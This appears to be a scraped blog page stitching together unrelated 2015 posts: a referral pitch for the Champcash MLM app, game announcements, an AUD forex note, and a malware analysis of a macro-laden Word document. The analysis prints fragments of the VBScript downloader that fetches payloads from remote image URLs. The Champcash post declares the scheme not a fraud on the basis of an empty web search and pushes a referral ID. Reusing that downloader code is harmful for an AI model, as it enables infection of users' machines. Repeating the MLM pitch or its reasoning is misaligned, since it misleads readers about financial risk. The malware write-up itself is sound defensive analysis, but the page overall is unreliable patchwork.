Wednesday, 20 May 2015

Champcash : A New Way to Earn Good Money

What is ChampCash?


Champcash is the latest app for android users to earn some extra bucks. Its like a MLM (Multi Level Marketting) scheme, in which you make new members by sending them the link of Champcash app. There is no fee to join this programme, instead you have to install some apps suggested by Champcash to be eligible for earning.


Install Champcash Now

Is Champcash a Fraud ?


I was also concerned about this thing when I first heard about Champcash. I searched for this issue on internet but got nothing. So I concluded that it is not a fraud. 

Try ChampCash

How does Champcash earn and provide incentive to its users?


Champcash gets money from various companies by getting their apps installed on the android devices of users. Champcash distributes a certain percentage of its earning through this MLM scheme. In this way people participate in it and the apps get installed in millions of android smartphones. A number of MLM schemes are running all over the world (example – Amway). Majority of the MLM schemes make good money for those who join it at an initial stage. So don’t wait and Install Champcash on your Android device now.

Be a part of Champcash

How can you withdraw the amount from Champcash?


There are 2 ways to do so. If it’s a small amount that you want to withdraw then you can recharge any mobile with amount minimum $1. But if it’s a large amount then you can withdraw it using wire transfer of paypal transfer. Mobile recharge is done instantly while the 2nd method takes at least a month to get the balance in your bank account. But such amounts are worth waiting to get in your bank account.

How to install Champcash and be eligible for earning ?


Follow the following steps to install Champcash on your Android Smartphone.

  • Install Champcash
  • Open Champcash in your Phone and Signup
  • It may ask you for Sponsor ID / Refer ID. Enter 43718
  • Now it will give you a challenge to install some apps. "Accept the challenge" . You might need to to install 7 to 10 Apps to complete the challenge. This the the most tough step as it takes more that 100 MB of your mobile data and your time. You have to install these apps and then open them for at least 1 minute.
  • Once you complete the above step you will be eligible for earning.
  • Then you can invite your friends to be a part of this scheme.
  • On every successful joining you get $0.5 to $1.5 depending upon your country. You can earn upto 7 levels of joining. But you commission decreases as the depth of level increases. But still it can earn you few good bucks. 

Whats the real benefit of joining Champcash ?


  • Your network works for you. You have to work only during the initial stage. Once some good users have joined under you then they will work for you automatically. Their referrals will automatically add commission in your account up to further several levels.
  • There is no limit for direct joining under you. So there is no limit to earning.
  • It turns your mobile phone into an earning machine.
  • Even if it don't make you a millionaire, it can earn you some extra money.
  • Its a good thing for those who work from home and have internet access on their android smartphone.

Join Champcash Now and earn unlimited.


By at No comments:
Labels:forex, iqoption, pubg Hacked ,

Wednesday, 13 May 2015

Limit Load, new arcade combat flight simulator

Stealth development might not be very "open-sourceish", but it sometimes makes for some nice surprises in our project showcase forum.

This time it was the completely new open-source game Limit Load, self described as:
A cockpit flight game that is more of an arcade than a sim. The game is built on the Panda3D game engine. It is similar to the ancient games like the classic Wings or the very good Strike Commander. The story and the atmosphere are important elements of the game, so a lot of focus is placed on that too.
Here is some in-game action and it seems quite polished already for such a new game:


Licensing of assets is still a bit of a grey area it seems, but they are fully aware of it:
The game code is licensed under GPL 3, and custom-made game assets under CC-by-SA 4.0. Some of the assets were taken from "free" (as in "not sure in which way") sources on the Internet, so their licensing situation is unclear. Eventually these should be cleared for use or replaced.
So where is my VR kit? :D
By at No comments:

Friday, 8 May 2015

New malicious Office docs trick


It all starts with the 1,000,000th usual spam mail in your inbox:

Have you received an order form? No.











The content is as follows:


Dear,

We have received your order form [AY19358KXN]  and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.

As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.

The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.


Attached is a DOC file with (surprise) a macro attached. However, the method's different than usual:


In the past, there have been some other new tricks as well, for example:
Analyzing an MS Word document not detected by AV software
XML: A New Vector For An Old Trick
Malware authors go a step further to access bank accounts

In regards to any Office files, you can simply open the file in Notepad++ for example and you'll see the .mso appended at the end. The new thing here is that it's a Word MHTML file with macro(s).

Using olevba (by @decalage2), we can extract and automatically decode the .mso object - which contains a bunch of (what appears to be) random gibberish:

Function that "Returns the character associated with the specified character code"






You can use the ASCII character code chart to figure out what this malware is doing exactly, for example the first line Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) is simply "HTTP".

Another option is to use a Python program made by Xavier Mertens, deobfuscate_chr.py.
You can find a Pastebin here with the extracted + deobfuscated macro.


Short analysis of this .doc file using olevba












Other tools are available as well, for example oledump and emldump from Didier Stevens.

Emldump + passing through oledump extracted a malicious link











 
Now, what happens when you execute this malicious Word file?

Oops, seems macros are disabled :)







If macros are enabled, or you choose to enable the macro in that document, a Pastebin download link was opened and the file was executed. Process flow is:

Word document -> download VBS from Pastebin -> Execute VBS -> Downloads & executes EXE file -> Downloads & executes another EXE file.

Visually, you might get either of these images:

dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg
















dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg












Dropper, payload, related files:

AY19358KXN.doc (original file)
SHA1: b2c793b1cf2cf11954492fd52e22a3b8a96dac15
VirusTotal

Extracted macro (I named it AY.vb)
SHA1: 79b0d7a7fe917583bc4f73ce1dbffc5497b6974d
VirusTotal

JGuigbjbff3f.vbs (dropped VBscript file)
SHA1: c8a914fdc18d43aabbf84732b97676bd17dc0f54
VirusTotal
Deobfuscated VBscript

o8237423.exe (dropper)
SHA1: 7edc7afb424e6f8fc5fb5bae3681195800ca8330
VirusTotal

DInput8.dll (payload)
SHA1: 8bfe59646bdf6591fa8213b30720553d78357a99
VirusTotal





Prevention



Conclusion

It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email. ;-)

If you're in an organisation, you might want to consider blocking the execution of all macros (or only allow the ones that are digitally signed if there's really no other choice) by using GPO.

You can find those templates here:
2007 Office system (SP2) Administrative Template files (ADM, ADMX, ADML) and Office Customization Tool 
Office 2010 Administrative Template files (ADM, ADMX/ADML) and Office Customization Tool download 
Office 2013 Administrative Template files (ADMX/ADML) and Office Customization Tool

Note: starting from Office 2010, macros are disabled by default.


Resources

ASCII Character Codes
Base64Decoder
Chr, ChrW Functions
Macros Explained: Why Microsoft Office Files Can Be Dangerous
OLE (Object Linking and Embedding)
oledump
oletools

By at No comments:
Labels:forex, iqoption, pubg Hacked , , , , , , , , , , , , , , ,

Thursday, 7 May 2015

Old school 2D RTS Wyrmsun is looking to be greenlit

We were kindly made aware by the main developer of the 2D RTS Wyrmsun that he is currently looking for support to get this game on the Steam platform (link includes a game-play video).

Here is a description of the game we got from him:
In Wyrmsun, humans, elves and dwarves all seek to carve a place for themselves on their different homeworlds, with humans living on Earth, dwarves dwelling on Nidavellir, and elves inhabiting Alfheim. In the game's missions, each world follows separate storylines, but the various civilizations can be mixed and matched in custom games.

Wyrmsun features:
  • Retro-style graphics
  • 2 playable civilizations, and a number of non-playable ones
  • 18 quests to play, earning technology points which can be used to obtain new units, buildings and technologies
  • 38 units, 30 buildings and 14 technologies
  • Units that can earn experience, being able to upgrade to new unit types or acquire new abilities upon level-up
  • Persistent heroes, who carry over their level and abilities throughout scenarios
  • Personal names and traits for units
  • Cave, Conifer Forest, Dungeon, Fairlimbed Forest and Swamp tilesets
  • 33 maps of real and fictional locations to choose from, as well as random maps
  • Living environment, with fauna reproduction and predation
  • Very moddable game, with mod-loading capability built in
  • Grand strategy mode, where production is resolved on the strategic (world map) level, while battles are resolved on the tactical level
  • In-game encyclopedia, allowing players to learn more about the units, buildings and other elements of the game, as well as their historical and mythological sources of inspiration.
For those more inclined to help out with the code, there are two code repositories: one for the game and one for the modified Stratagus engine.

P.S.: Yes FOSS games can be on Steam as long as they don't integrate with closed source steam integration libraries; And it can be a great way to attract more users to your game and maybe even collect some donations or sell add-ons (preferably in a "release freely when sufficient funds are gathered" style). See this game for an successful example.
By at No comments:

Sunday, 3 May 2015

AUS/USD Forex Report 4th MAY 2015

AUD Primary Cycles

The Completion of the Break & Extend pattern from the 2014 lows into major support @ 7567
has provided a robust pattern for the AUD to continue to rise up into the 3-month highs. 

That 3-month high is now 80.90 in MAY, and if it's going to continue higher then the support level becomes .7802-.7819 (Yearly lows and 3-month 50% level)

Above .8090 (resistance) and trend bias is to move back towards the 2015 50% level over the next 6 months.

Short-term and we have tomorrow's interest rate announcement, and if they drop rates then it could put pressure on the AUD once again.

However, last week's spike and retracement might have that already factored in, as the Reserve bank leaked the news early.

Therefore don't be surprised to see the AUD move upwards after the news. (trade on the side of .7802)



By at No comments:
Subscribe to: Posts (Atom)